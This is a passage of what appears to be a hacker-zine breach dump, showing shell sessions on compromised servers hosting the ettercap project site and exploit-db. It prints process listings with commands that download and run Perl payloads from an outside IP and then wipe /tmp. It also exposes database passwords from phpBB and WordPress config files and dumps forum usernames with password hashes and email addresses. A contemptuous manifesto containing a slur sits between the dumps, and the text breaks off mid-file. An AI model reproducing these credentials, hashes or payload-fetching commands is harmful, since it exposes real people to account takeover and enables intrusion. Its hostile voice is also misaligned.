2431rtstats 15645 1.6 0.1 179260 10884 ? S Nov16 221:11 /usr/bin/python /var/local/stats/rtstats/datasources/prweb.py --daemonize --tail --pidfile /var/run/rtstats/prweb.pid --infolog /var/log/rtstats/datasource-prweb.log --configfile /var/local/config/rtstats/datasources/prweb.cfg --configfile /var/local/stats/rtstats.cfg
2432apache 16268 0.0 0.0 60804 1508 ? S Nov19 0:00 lftp -u GFS,87dbcvwx15s4f56ds54f perfo-lehavre.no-ip.org -p 146 -e lcd "/home/groups/f/fl/florianrobinet/htdocs/GFS/Archives"; mirror -s -R --Remove-source-files; exit
2433apache 17814 0.0 0.0 8704 1040 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2434apache 17818 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2435apache 18478 0.0 0.3 391904 28156 ? S 03:26 0:13 /usr/sbin/httpd
2436apache 18960 2.8 0.5 398652 45604 ? S 12:25 0:05 /usr/sbin/httpd
2437apache 19043 2.5 0.4 398116 33464 ? S 12:25 0:05 /usr/sbin/httpd
2438apache 19055 4.9 0.5 405644 41216 ? S 12:25 0:09 /usr/sbin/httpd
2439apache 19056 2.9 0.4 402072 37836 ? S 12:25 0:05 /usr/sbin/httpd
2440apache 19077 2.5 0.4 399132 35544 ? S 12:25 0:04 /usr/sbin/httpd
2441apache 19093 3.0 0.4 397244 34216 ? S 12:25 0:05 /usr/sbin/httpd
2442apache 19094 3.1 0.5 398832 43744 ? S 12:25 0:05 /usr/sbin/httpd
2443apache 19741 0.0 0.0 8704 1028 ? S 03:29 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2444apache 19745 0.0 0.0 58608 2616 ? S 03:29 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2445apache 19789 2.0 0.4 394212 36988 ? S 12:27 0:02 /usr/sbin/httpd
2446apache 19903 2.4 0.4 396360 37188 ? S 12:27 0:02 /usr/sbin/httpd
2447apache 19945 2.7 0.3 395120 30760 ? S 12:27 0:02 /usr/sbin/httpd
2448apache 20138 3.1 0.3 395072 30492 ? S 12:27 0:02 /usr/sbin/httpd
2449apache 20203 2.0 0.4 394404 35928 ? S 12:27 0:01 /usr/sbin/httpd
2450apache 20274 3.0 0.3 397052 30000 ? S 12:27 0:02 /usr/sbin/httpd
2451apache 20434 0.0 0.3 401880 29916 ? S Nov24 0:28 /usr/sbin/httpd
2452apache 20439 2.5 0.3 393252 30576 ? S 12:28 0:01 /usr/sbin/httpd
2453apache 22124 0.0 0.4 401232 34788 ? S Nov24 0:05 /usr/sbin/httpd
2454apache 23720 0.0 0.0 8704 1008 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2455apache 23722 0.0 0.0 58608 2620 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2456apache 24614 0.0 0.0 8704 1020 ? S Nov24 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2457apache 24616 0.0 0.0 58608 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2458apache 24714 0.0 0.1 377988 12680 ? S Nov24 0:00 /usr/sbin/httpd
2459apache 24719 0.0 0.0 8704 980 ? S Nov24 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
2460apache 24720 0.0 0.0 58616 2624 ? S Nov24 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
2461apache 25971 0.0 0.0 8704 828 ? S Nov21 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2462apache 25974 0.0 0.0 58608 1512 ? S Nov21 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2463root 27631 0.0 0.0 0 0 ? S Nov23 0:00 [pdflush]
2464apache 31023 0.0 0.1 399148 8908 ? S Nov23 0:04 /usr/sbin/httpd
2465apache 31873 0.0 0.3 388288 25512 ? S 01:48 0:01 /usr/sbin/httpd
2466apache 32062 0.0 0.0 8704 1064 ? S 01:48 0:00 sh -c cd /tmp;rm -rf *;lftpget http://95.178.16.118/scax.txt;perl scax.txt;cd /tmp; rm -rf *
2467apache 32067 0.0 0.0 58608 2620 ? S 01:48 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/scax.txt";
2468apache 32288 0.0 0.0 8704 820 ? S Nov23 0:00 sh -c cd /tmp;lftpget http://95.178.16.118/b;chmod x b;perl b;cd /tmp;rm -rf *;
2469apache 32289 0.0 0.0 58608 1508 ? S Nov23 0:00 lftp -c set cmd:at-exit;set xfer:max-redirections 16; get1 "http://95.178.16.118/b";
2470
2471$ w
2472 12:28:48 up 30 days, 40 min, 1 user, load average: 0.65, 0.64, 0.66
2473USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
2474root pts/0 sec-sog-2.v99.ch 04:17 8:03m 0.11s 0.11s -bash
2475
2476$ ls -lah /home/groups/e/et/ettercap/htdocs/
2477total 2.7M
2478drwxrwsr-x 8 dummy 18435 2.0K Oct 18 2009 .
2479drwxrws--x 5 dummy 18435 1.0K Sep 17 2008 ..
2480-rw-r--r-- 1 42100 18435 2.2K Dec 21 2004 authors.php
2481drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 devel
2482-rw-r--r-- 1 42100 18435 1.6K Apr 15 2004 download.php
2483-rw-r--r-- 1 42100 18435 2.7K Apr 24 2004 fingerprint.php
2484drwx--x--x 10 42100 18435 2.0K Oct 18 2009 forum
2485-rw-r--r-- 1 42100 18435 2.2K Apr 15 2004 history.php
2486drwxr-xr-x 3 42100 18435 1.0K Aug 9 2008 images
2487drwxr-xr-x 2 42100 18435 1.0K Aug 9 2008 includes
2488-rw-r--r-- 1 42100 18435 4.6K Sep 23 2004 index.php
2489-rw-r--r-- 1 42100 18435 768 Apr 15 2004 latest.php
2490-rw-r--rw- 1 42100 18435 5 Aug 15 2005 latest.stat
2491-rw-r--r-- 1 42100 18435 886 Apr 15 2004 news.php
2492-rw-r--r-- 1 42100 18435 5.3K Nov 13 2003 news.txt
2493-rw-r--r-- 1 42100 18435 2.3M Oct 18 2009 phpBB-3.0.5.zip
2494drwxr-xr-x 13 42100 18435 2.0K Oct 18 2009 phpBB3
2495-rw-r--r-- 1 42100 18435 743 Apr 15 2004 plugins.php
2496-rw-r--r-- 1 42100 18435 914 May 6 2003 plugins.txt
2497drwxr-xr-x 2 42100 18435 2.0K Aug 9 2008 release
2498-rw-r--r-- 1 42100 18435 3.7K Apr 15 2004 screenshots.php
2499-rw-r--r-- 1 42100 18435 1019 Apr 15 2004 search.php
2500-rw-r--r-- 1 42100 18435 1.8K Apr 15 2004 stuff.php
2501-rw-r--r-- 1 42100 18435 1.5K Jan 25 2001 style.css
2502-rw-r--rw- 1 42100 18435 3.0K Aug 15 2005 submitted.fingers.txt
2503-rw-r--r-- 1 42100 18435 12K Jun 24 2005 updateNG.data
2504-rw-rw-rw- 1 42100 18435 230K Aug 15 2005 updateNG.log
2505-rw-r--r-- 1 42100 18435 2.0K Nov 9 2005 updateNG.php
2506-rwxr-xr-x 1 42100 18435 201 Jul 13 2003 updateNG.sh
2507
2508$ cat /home/groups/e/et/ettercap/htdocs/updateNG.sh
2509#!/bin/sh
2510
2511wget http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/ettercap/ettercap_ng/share/ -O updateNG.data
2512chmod 644 updateNG.data
2513scp updateNG.data alor@ettercap.sf.net:ettercap
2514rm -f updateNG.data
2515
2516$ cat /home/groups/e/et/ettercap/htdocs/forum/config.php
2517<?php
2518
2519//
2520// phpBB 2.x auto-generated config file
2521// Do not change anything in this file!
2522//
2523
2524$dbms = "mysql";
2525
2526$dbhost = "mysql4-e";
2527$dbname = "e17435_etterforum";
2528$dbuser = "e17435admin";
2529$dbpasswd = "ettersql_a";
2530
2531$table_prefix = "phpbb_";
2532
2533define('PHPBB_INSTALLED', true);
2534
2535define('DEBUG', true);
2536
2537?>
2538
2539$ SELECT phpbb_users.username, phpbb_users.user_password, phpbb_users.user_email,
2540phpbb_ranks.rank_title FROM phpbb_users LEFT JOIN phpbb_ranks ON user_rank = rank
2541id WHERE user_rank > 0 ORDER BY user_rank
2542NaGA:256ce2d528caee146c82f20a3378673f:naga@antifork.org:Ettercap Developer
2543ares:9c05a83765c4aad064d737496dae2dee:ares@inwind.it:Supporter
2544metaldemon:3ef4f11188954e64884037cae7c3e963:metaldemon@tiscalinet.it:Supporter
2545ttyp1:3c5e778f14dee668c0a9560fb8a6ced2:yokel4@anonymous.to:Betatester
2546drygol:c8214d5d4d4eb4b45d2bca063c07dd6a:pandrychowski@lpp.com.pl:Betatester
2547Gumble:ce7bcda695c30aa2f9e5f390c820d985:dukegumble@redseven.de:Betatester
2548Acelent:817b61c60959294d4250912f816f9451:acelent@gmail.com:Betatester
2549Jammer:a13f5ed8c46f26076c20fd4829901bc8:jammer@mauigateway.com:Betatester
2550m|n|moE:de9cb5d4ae42da6b8eb6623c322fa200:minimoe@home.se:Betatester
2551Crusher4:2df66ae5eb0807dd2b84933adf3c4981:Crusher4@mac.com:Betatester
2552MathieuMa:f8c22494a40f2c034aa73b891135da85:math.m@promac.org:Betatester
2553Mapes:3e1bbf17e6528381ae1e1e596733fb9a:bellizzi@pacbell.net:Betatester
2554garaged:3c2234a7ce973bc1700e0c743d6a819c:maxvaldez@yahoo.com:Betatester
2555Piw:a980baafb7bdb3d71aec6fc3776323ac:piw69@rpg.pl:Betatester
2556mod7:e40fbc4015c12f4c97e5e65b38127a96:ghy7765@yahoo.com:Betatester
2557stromax:274216f1c8423d3bad9cc3f684e31ffa:thomas@limone.ch:Betatester
2558DigitalDust:e80eded141e1295d694cd35cf2b8f675:jason@evilroot.net:Betatester
2559cableguy:37430a92973d1adca9934f0a5ecc53d2:cableguy@iname.com:Betatester
2560Suntac:9e220ad44ce3cae2c5dd5a6a6e770837:Suntac@dds.nl:Betatester
2561SGResu:0d736aad1ff5a82ca580e7980f2de88d:sgresu@hotmail.com:joker
2562LnZ:292b804c2895989cebef7340971d1e8d:lporro@libero.it:fac totum
2563megabug:74b468fafab62ade90622085691026dd:megabug@xerxes.stru.polimi.it:
2564Zero_Chaos:7b24afc8bc80e548d66c4e7ff72171c5:sidhayn@hotmail.com:Contributor
2565daten:eff1541059e9a263b245657e1805b339:daten@users.sourceforge.net:Contributor
2566
2567
2568 ____________________________________________________|_._._._._._._._,
2569 \___________________________________________________|_|_|_|_|_|_|_|_|
2570 ! ~ exploit-db ~
2571
2572Now we come to a different topic. A topic about people who leech off
2573what the scene creates and call it their own. About people who
2574copyright ideas and papers about security related topics that have
2575been around for years. How many XSS-Papers are there currently on
2576exploit-db? How many retarded strcpy(buf, argv[1])-papers are being
2577written over and over again? About whitehats who think releasing
2578exploits would make the world much more safe. And because of fame.
2579They all want fame so badly that they do anything and everything in
2580order to be part of the security industry. What's even more hilarious
2581is that these "famous" security people keep getting owned. We mean
2582el8, phc, h0no, and zf0 have all owned these "Security Rockstar"
2583faggots and yet, nothing changes. Or the attacks are categorized as
2584"skiddy" behavior. It's rediculous how terrible the industry is. There
2585is no accountability anymore.
2586
2587Still there are some lame skids that need a good spanking. Stupid 10
2588year olds who take perl-exploits to destroy clan-pages for fun and
2589call themselves "hackers" without knowing what they are doing.
2590Criminals who take exploits to steal payment stuff for their own
2591selfish financial gain. And to get their friends thrown in jail
2592(soup). Fame and money... Get the message?
2593
2594$ uname -a
2595Linux www 2.6.32-25-server #45-Ubuntu SMP Sat Oct 16 20:06:58 UTC 2010 x86_64 GNU/Linux
2596
2597$ id
2598uid=33(www-data) gid=33(www-data) groups=33(www-data)
2599
2600$ pwd
2601/var/www
2602
2603$ ls -la
2604total 24180
2605drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 .
2606drwxr-xr-x 19 root root 4096 Sep 24 09:26 ..
2607-rw-r--r-- 1 www-data www-data 1005 Nov 12 19:03 .htaccess
2608-rw-r--r-- 1 www-data www-data 764 Nov 5 17:32 .htaccess.save
2609-rw-r--r-- 1 www-data www-data 2820676 Nov 15 14:26 1920x1200_edb-wallpaper.png
2610drwxr-xr-x 4 www-data www-data 4096 Nov 11 07:43 92384723987239847239847234982734
2611-rw-r--r-- 1 www-data www-data 46149 Nov 11 17:04 apc123456.php
2612-rw-r--r-- 1 www-data www-data 10723590 Nov 28 06:52 archive.tar.bz2
2613-rw-r--r-- 1 www-data www-data 18851 Jul 9 14:42 disclosure.html
2614-rw-r--r-- 1 www-data www-data 11662 Nov 11 11:42 dorkorinos.txt
2615drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 edbpartners
2616-rw-r--r-- 1 www-data www-data 1406 Jul 9 14:53 favicon.ico
2617-rw-r--r-- 1 www-data www-data 1921 Jul 9 14:42 feature.txt
2618-rw-r--r-- 1 www-data www-data 1923 Jul 11 16:01 feature1.txt
2619drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 forums
2620drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:41 funny404
2621-rw-r--r-- 1 www-data www-data 1119 Nov 22 07:45 gd_rss.php
2622-rw-r--r-- 1 www-data www-data 65 Aug 26 04:53 goaway.php
2623-rw-r--r-- 1 www-data www-data 53 Jul 9 14:42 googled6c4817aa45e0032.html
2624-rw-r--r-- 1 www-data www-data 5 Nov 11 07:24 hola.txt
2625-rw-r--r-- 1 www-data www-data 3154634 Nov 11 07:25 hola.xml
2626drwxr-xr-x 15 www-data www-data 4096 Nov 22 15:50 images
2627-rw-r--r-- 1 www-data www-data 397 Aug 26 04:53 index.php
2628drwxr-xr-x 2 www-data www-data 4096 Nov 4 12:20 leetdownloads
2629-rw-r--r-- 1 www-data www-data 311 Nov 12 18:40 maintenance.php
2630drwxr-xr-x 2 root root 4096 Nov 26 10:18 movies
2631-rw-r--r-- 1 www-data www-data 106 Aug 26 04:53 news.php
2632drwxr-xr-x 2 www-data www-data 4096 Nov 11 17:20 nginx-default
2633-rw-r--r-- 1 www-data www-data 220 Oct 30 17:00 pagerank.html
2634-rw-r--r-- 1 www-data www-data 761 Sep 6 06:12 rating.txt
2635-rw-r--r-- 1 www-data www-data 9122 Aug 18 05:32 readme.html
2636-rw-r--r-- 1 www-data www-data 47 Jul 9 14:53 robots_ssl.txt
2637-rw-r--r-- 1 www-data www-data 4007150 Dec 1 07:47 ror.xml
2638-rw-r--r-- 1 www-data www-data 2102 Sep 1 05:40 rss.php
2639drwxr-xr-x 2 www-data www-data 4096 Jul 9 14:42 scripts
2640-rw-r--r-- 1 www-data www-data 1056 Sep 3 18:05 search-mobile.php
2641-rw-r--r-- 1 www-data www-data 108 Aug 26 04:53 search.php
2642-rw-r--r-- 1 www-data www-data 3337393 Dec 1 07:47 sitemap.xml
2643-rw-r--r-- 1 www-data www-data 3462 Aug 19 11:37 sitemap.xsl
2644-rw-r--r-- 1 www-data www-data 30533 Nov 30 17:52 sitemap_blog.xml
2645-rw-r--r-- 1 www-data www-data 4229 Nov 30 17:52 sitemap_blog.xml.gz
2646drwxr-xr-x 3 www-data www-data 4096 Jul 9 14:42 slider
2647drwxr-xr-x 2 www-data www-data 20480 Dec 4 09:18 sploits
2648-rw-r--r-- 1 www-data www-data 9621 Nov 3 19:52 style.css
2649drwxr-xr-x 2 www-data www-data 4096 Sep 23 06:40 testme
2650-rw-r--r-- 1 www-data www-data 5699 Nov 4 07:22 tpl_search.php
2651-rw-r--r-- 1 www-data www-data 16 Nov 28 06:52 update-982374.txt
2652-rw-r--r-- 1 www-data www-data 50 Aug 26 04:53 updated.php
2653drwxr-xr-x 3 www-data www-data 4096 Aug 3 09:35 videos
2654-rw-r--r-- 1 www-data www-data 4391 Aug 26 04:53 wp-activate.php
2655drwxr-xr-x 8 www-data www-data 4096 Nov 11 17:59 wp-admin
2656-rw-r--r-- 1 www-data www-data 40284 Aug 26 04:53 wp-app.php
2657-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-atom.php
2658-rw-r--r-- 1 www-data www-data 274 Aug 26 04:53 wp-blog-header.php
2659-rw-r--r-- 1 www-data www-data 3926 Aug 26 04:53 wp-comments-post.php
2660-rw-r--r-- 1 www-data www-data 238 Aug 26 04:53 wp-commentsrss2.php
2661-rw-r--r-- 1 www-data www-data 3173 Aug 26 04:53 wp-config-sample.php
2662-rw-r--r-- 1 www-data www-data 2832 Nov 11 17:59 wp-config.php
2663drwxr-xr-x 8 www-data www-data 4096 Dec 3 22:49 wp-content
2664-rw-r--r-- 1 www-data www-data 1255 Aug 26 04:53 wp-cron.php
2665-rw-r--r-- 1 www-data www-data 240 Aug 26 04:53 wp-feed.php
2666drwxr-xr-x 7 www-data www-data 4096 Sep 8 13:52 wp-includes
2667-rw-r--r-- 1 www-data www-data 2002 Aug 26 04:53 wp-links-opml.php
2668-rw-r--r-- 1 www-data www-data 2441 Aug 26 04:53 wp-load.php
2669-rw-r--r-- 1 www-data www-data 26160 Sep 3 21:48 wp-login.php
2670-rw-r--r-- 1 www-data www-data 7774 Aug 26 04:53 wp-mail.php
2671-rw-r--r-- 1 www-data www-data 487 Aug 26 04:53 wp-pass.php
2672-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rdf.php
2673-rw-r--r-- 1 www-data www-data 316 Aug 26 04:53 wp-register.php
2674-rw-r--r-- 1 www-data www-data 218 Aug 26 04:53 wp-rss.php
2675-rw-r--r-- 1 www-data www-data 220 Aug 26 04:53 wp-rss2.php
2676-rw-r--r-- 1 www-data www-data 9177 Sep 8 13:01 wp-settings.php
2677-rw-r--r-- 1 www-data www-data 18695 Aug 26 04:53 wp-signup.php
2678-rw-r--r-- 1 www-data www-data 3702 Aug 26 04:53 wp-trackback.php
2679-rw-r--r-- 1 www-data www-data 93955 Aug 26 04:53 xmlrpc-orig.php
2680-rw-r--r-- 1 www-data www-data 94184 Aug 26 04:53 xmlrpc.php
2681
2682
2683$ cat wp-config.php
2684<?php
2685/**
2686 * The base configurations of the WordPress.
2687 *
2688 * This file has the following configurations: MySQL settings, Table Prefix,
2689 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
2690 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
2691 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
2692 *
2693 * This file is used by the wp-config.php creation script during the
2694 * installation. You don't have to use the web site, you can just copy this file
2695 * to "wp-config.php" and fill in the values.
2696 *
2697 * @package WordPress
2698 */
2699
2700// ** MySQL settings - You can get this info from your web host ** //
2701/** The name of the database for WordPress */
2702//define('DB_NAME', 'explot2');
2703define('WP_CACHE', true); //Added by WP-Cache Manager
2704define('DB_NAME', 'edb_new');
2705
2706/** MySQL database username */
2707define('DB_USER', 'edbuser');
2708
2709/** MySQL database password */
2710//define('DB_PASSWORD', 'admin123');
2711define('DB_PASSWORD', '2834729347928372342');
2712//define('DB_PASSWORD', 'f00b204e98009d22b68e54a');
2713
2714/** MySQL hostname */
2715define('DB_HOST', 'localhost');
2716define('WP_MEMORY_LIMIT', '1024M');
2717/** Database Charset to use in creating database tables. */
2718define('DB_CHARSET', 'utf8');
2719
2720/** The Database Collate type. Don't change this if in doubt. */
2721define('DB_COLLATE', '');
2722define('FORCE_SSL_LOGIN', true);
2723
2724/**#@+
2725 * Authentication Unique Keys.
2726 *
2727 * Change these to different unique phrases!
2728 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/ WordPress.org secret-k
2729 * You can change these at any point in time to invalidate all existing cookies. This will force all users
2730 in again.
2731 *
2732 * @since 2.6.0
2733 */
2734define('AUTH_KEY', 'put your unique phrase here');
2735define('SECURE_AUTH_KEY', 'put your unique phrase here');
2736define('LOGGED_IN_KEY', 'put your unique phrase here');
2737define('NONCE_KEY', 'put your unique phrase here');
2738/**#@-*/
2739
2740/**
2741 * WordPress Database Table prefix.
2742 *
2743 * You can have multiple installations in one database if you give each a unique
2744 * prefix. Only numbers, letters, and underscores please!
2745 */
2746$table_prefix = 'wp_';
2747
2748/**
2749 * WordPress Localized Language, defaults to English.
2750 *
2751 * Change this to localize WordPress. A corresponding MO file for the chosen
2752 * language must be installed to wp-content/languages. For example, install
2753 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German
2754 * language support.
2755 */
2756define ('WPLANG', '');
2757
2758/* That's all, stop editing! Happy blogging. */
2759
2760/** Absolute path to the WordPress directory. */
2761if ( !defined('ABSPATH') )
2762 define('ABSPATH', dirname(__FILE__) . '/');
2763
2764/** Sets up WordPress vars and included files. */
2765require_once(ABSPATH . 'wp-settings.php');
2766
2767define('WP_DEBUG',true);
2768define('WP_MEMORY_LIMIT', '128M');
2769
2770$ cd forums
2771
2772$ ls -la
2773total 2344
2774drwxr-xr-x 21 www-data www-data 4096 Nov 22 20:06 .
2775drwxr-xr-x 18 www-data www-data 4096 Nov 26 10:16 ..
2776-rw-r--r-- 1 www-data www-data 1008 Nov 6 12:03 .htaccess
2777-rw-rw-r-- 1 www-data www-data 17862 Nov 22 20:01 LICENSE
2778drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp
2779drwxr-xr-x 3 www-data www-data 4096 Nov 22 20:04 admincp-23987239874298273987234
2780-rwxr-xr-x 1 www-data www-data 40193 Nov 22 20:01 ajax.php
2781-rwxr-xr-x 1 www-data www-data 75603 Nov 22 20:01 album.php
2782-rwxr-xr-x 1 www-data www-data 19119 Nov 22 20:01 announcement.php
2783drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 archive
2784-rwxr-xr-x 1 www-data www-data 9040 Nov 22 20:01 asset.php
2785-rwxr-xr-x 1 www-data www-data 21161 Nov 22 20:01 assetmanage.php
2786-rwxr-xr-x 1 www-data www-data 15788 Nov 22 20:01 attachment.php
2787-rwxr-xr-x 1 www-data www-data 6935 Nov 22 20:01 attachment_inlinemod.php
2788-rwxr-xr-x 1 www-data www-data 3616 Nov 22 20:01 blog_attachment.php
2789-rwxr-xr-x 1 www-data www-data 96121 Nov 22 20:01 calendar.php
2790-rwxr-xr-x 1 www-data www-data 43 Nov 22 20:01 clear.gif
2791drwxr-xr-x 9 www-data www-data 4096 Nov 6 11:22 clientscript
2792-rwxr-xr-x 1 www-data www-data 15786 Nov 22 20:01 converse.php
2793drwxr-xr-x 7 www-data www-data 4096 Nov 6 11:22 cpstyles
2794-rwxr-xr-x 1 www-data www-data 3309 Nov 22 20:01 cron.php
2795-rwxr-xr-x 1 www-data www-data 6145 Nov 22 20:01 css.php
2796drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customavatars
2797drwxr-xr-x 3 www-data www-data 4096 Nov 6 11:22 customgroupicons
2798drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 customprofilepics
2799-rwxr-xr-x 1 www-data www-data 1823 Nov 22 20:01 editor.php
2800-rwxr-xr-x 1 www-data www-data 47010 Nov 22 20:01 editpost.php
2801-rwxr-xr-x 1 www-data www-data 1427 Nov 22 20:01 entry.php
2802-rwxr-xr-x 1 www-data www-data 30084 Nov 22 20:01 external.php
2803-rwxr-xr-x 1 www-data www-data 9966 Nov 22 20:01 faq.php
2804-rwxr-xr-x 1 www-data www-data 10134 Nov 22 20:01 favicon.ico
2805-rwxr-xr-x 1 www-data www-data 23332 Nov 22 20:01 forum.php
2806-rwxr-xr-x 1 www-data www-data 42452 Nov 22 20:01 forumdisplay.php
2807-rwxr-xr-x 1 www-data www-data 2066 Nov 22 20:01 global.php
2808-rwxr-xr-x 1 www-data www-data 155838 Nov 22 20:01 group.php
2809-rwxr-xr-x 1 www-data www-data 26150 Nov 22 20:01 group_inlinemod.php
2810-rwxr-xr-x 1 www-data www-data 11883 Nov 22 20:01 groupsubscription.php
2811-rwxr-xr-x 1 www-data www-data 9039 Nov 22 20:01 image.php
2812drwxr-xr-x 24 www-data www-data 4096 Nov 6 13:16 images
2813drwxr-xr-x 8 www-data www-data 12288 Nov 6 14:29 includes
2814-rwxr-xr-x 1 www-data www-data 2396 Nov 22 20:01 index.php
2815-rwxr-xr-x 1 www-data www-data 47021 Nov 22 20:01 infraction.php
2816-rwxr-xr-x 1 www-data www-data 187803 Nov 22 20:01 inlinemod.php
2817-rwxr-xr-x 1 www-data www-data 11440 Nov 22 20:01 joinrequests.php
2818-rwxr-xr-x 1 www-data www-data 1757 Nov 22 20:01 list.php
2819-rwxr-xr-x 1 www-data www-data 10947 Nov 22 20:01 login.php
2820-rwxr-xr-x 1 www-data www-data 30244 Nov 22 20:01 member.php
2821-rwxr-xr-x 1 www-data www-data 16392 Nov 22 20:01 member_inlinemod.php
2822-rwxr-xr-x 1 www-data www-data 40345 Nov 22 20:01 memberlist.php
2823-rwxr-xr-x 1 www-data www-data 22264 Nov 22 20:01 misc.php
2824drwxr-xr-x 2 www-data www-data 4096 Nov 22 20:01 modcp
2825drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:55 modcp-23987239874298273987234
2826-rwxr-xr-x 1 www-data www-data 76827 Nov 22 20:01 moderation.php
2827-rwxr-xr-x 1 www-data www-data 6779 Nov 22 20:01 moderator.php
2828-rwxr-xr-x 1 www-data www-data 17552 Nov 22 20:01 newattachment.php
2829-rwxr-xr-x 1 www-data www-data 41079 Nov 22 20:01 newreply.php
2830-rwxr-xr-x 1 www-data www-data 20185 Nov 22 20:01 newthread.php
2831-rwxr-xr-x 1 www-data www-data 21802 Nov 22 20:01 online.php
2832drwxr-xr-x 5 www-data www-data 4096 Nov 6 11:22 packages
2833-rwxr-xr-x 1 www-data www-data 8096 Nov 22 20:01 payment_gateway.php
2834-rwxr-xr-x 1 www-data www-data 13360 Nov 22 20:01 payments.php
2835-rwxr-xr-x 1 www-data www-data 4156 Nov 22 20:01 picture.php
2836-rwxr-xr-x 1 www-data www-data 16665 Nov 22 20:01 picture_inlinemod.php
2837-rwxr-xr-x 1 www-data www-data 26169 Nov 22 20:01 picturecomment.php
2838-rwxr-xr-x 1 www-data www-data 29338 Nov 22 20:01 poll.php
2839-rwxr-xr-x 1 www-data www-data 10414 Nov 22 20:01 posthistory.php
2840-rwxr-xr-x 1 www-data www-data 76585 Nov 22 20:01 postings.php
2841-rwxr-xr-x 1 www-data www-data 7087 Nov 22 20:01 printthread.php
2842-rwxr-xr-x 1 www-data www-data 79435 Nov 22 20:01 private.php
2843-rwxr-xr-x 1 www-data www-data 163695 Nov 22 20:01 profile.php
2844-rwxr-xr-x 1 www-data www-data 56363 Nov 22 20:01 register.php
2845-rwxr-xr-x 1 www-data www-data 7294 Nov 22 20:01 report.php
2846-rwxr-xr-x 1 www-data www-data 14765 Nov 22 20:01 reputation.php
2847-rwxr-xr-x 1 www-data www-data 35793 Nov 22 20:01 search.php
2848-rwxr-xr-x 1 www-data www-data 22710 Nov 22 20:01 sendmessage.php
2849-rwxr-xr-x 1 www-data www-data 12485 Nov 22 20:01 showgroups.php
2850-rwxr-xr-x 1 www-data www-data 12738 Nov 22 20:01 showpost.php
2851-rwxr-xr-x 1 www-data www-data 80115 Nov 22 20:01 showthread.php
2852drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 signaturepics
2853drwxr-xr-x 2 www-data www-data 4096 Nov 6 11:22 store_sitemap
2854-rwxr-xr-x 1 www-data www-data 38862 Nov 22 20:01 subscription.php
2855-rwxr-xr-x 1 www-data www-data 5399 Nov 22 20:01 tags.php
2856-rwxr-xr-x 1 www-data www-data 8800 Nov 22 20:01 threadrate.php
2857-rwxr-xr-x 1 www-data www-data 11146 Nov 22 20:01 threadtag.php
2858-rwxr-xr-x 1 www-data www-data 61 Nov 22 20:01 uploadprogress.gif
2859-rwxr-xr-x 1 www-data www-data 39717 Nov 22 20:01 usercp.php
2860-rwxr-xr-x 1 www-data www-data 21034 Nov 22 20:01 usernote.php
2861drwxr-xr-x 13 www-data www-data 4096 Nov 6 11:22 vb
2862drwxr-xr-x 8 www-data www-data 4096 Nov 6 12:23 vboptimise
2863-rw-r--r-- 1 www-data www-data 2324 Nov 6 12:23 vboptimise.php
2864drwxr-xr-x 4 www-data www-data 4096 Nov 6 11:55 vbseo
2865-rw-r--r-- 1 www-data www-data 45286 Nov 6 11:55 vbseo.php
2866drwxr-xr-x 4 www-data www-data 4096 Nov 6 14:29 vbseo_sitemap
2867-rw-r--r-- 1 www-data www-data 4335 Nov 6 11:55 vbseocp.php
2868-rwxr-xr-x 1 www-data www-data 27879 Nov 22 20:01 visitormessage.php
2869-rwxr-xr-x 1 www-data www-data 1761 Nov 22 20:01 widget.php
2870-rwxr-xr-x 1 www-data www-data 3952 Nov 22 20:01 xmlsitemap.php
2871
2872$ cat includes/config.php
2873<?php
2874/*======================================================================*\
2875|| #################################################################### ||
2876|| # vBulletin 4.0.8
2877|| # ---------------------------------------------------------------- # ||
2878|| # All PHP code in this file is �2000-2010 vBulletin Solutions Inc. # ||
2879|| # This file may not be redistributed in whole or significant part. # ||
2880|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
2881|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
2882|| #################################################################### ||
2883\*======================================================================*/
2884
2885/*-------------------------------------------------------*\
